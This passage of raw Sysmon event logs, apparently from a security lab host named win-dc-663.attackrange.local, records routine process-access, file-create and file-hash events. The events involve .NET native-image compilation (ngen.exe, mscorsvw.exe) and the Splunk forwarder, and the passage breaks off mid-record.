21:04:31.740{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-DD03-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.709{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B807BF3D360153F665C5D2F888C4B430,SHA256=424085B62904914D192FCF0789A3E7988437D7B738498387891DAA156870AE11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.694{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-DC03-00000000CF01}5912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.678{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-DC03-00000000CF01}5912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.678{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-DC03-00000000CF01}5912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:31.662{4DB9351A-A1DF-60D3-DB03-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd8-0\Microsoft.Windows.Diagnosis.Commands.UpdateDiagReport.dll2021-06-23 21:04:31.662 10341000x800000000000000020870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.600{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-DB03-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.584{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-DB03-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.584{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-DB03-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.506{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-DA03-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.490{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-DA03-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.490{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-DA03-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:31.475{4DB9351A-A1DF-60D3-D903-00000000CF01}1272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4f8-0\Microsoft.Windows.Diagnosis.Commands.GetDiagInput.dll2021-06-23 21:04:31.475 10341000x800000000000000020863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.428{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-D903-00000000CF01}1272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.397{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-D903-00000000CF01}1272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.397{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-D903-00000000CF01}1272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.334{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-D803-00000000CF01}5764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.319{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-D803-00000000CF01}5764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.319{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-D803-00000000CF01}5764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:31.287{4DB9351A-A1DF-60D3-D703-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1920-0\Microsoft.Windows.DeviceHealthAttestation.Plugin.dll2021-06-23 21:04:31.287 23542300x800000000000000020856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.194{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=824D041FE0E772B84CF2B0E0602D0095,SHA256=F9C2CBDF8EF115369860BF898AE94C9198981687B12E16219C873232C5C1A711,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.178{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-D703-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.147{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-D703-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.147{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-D703-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-D603-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.022{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-D603-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 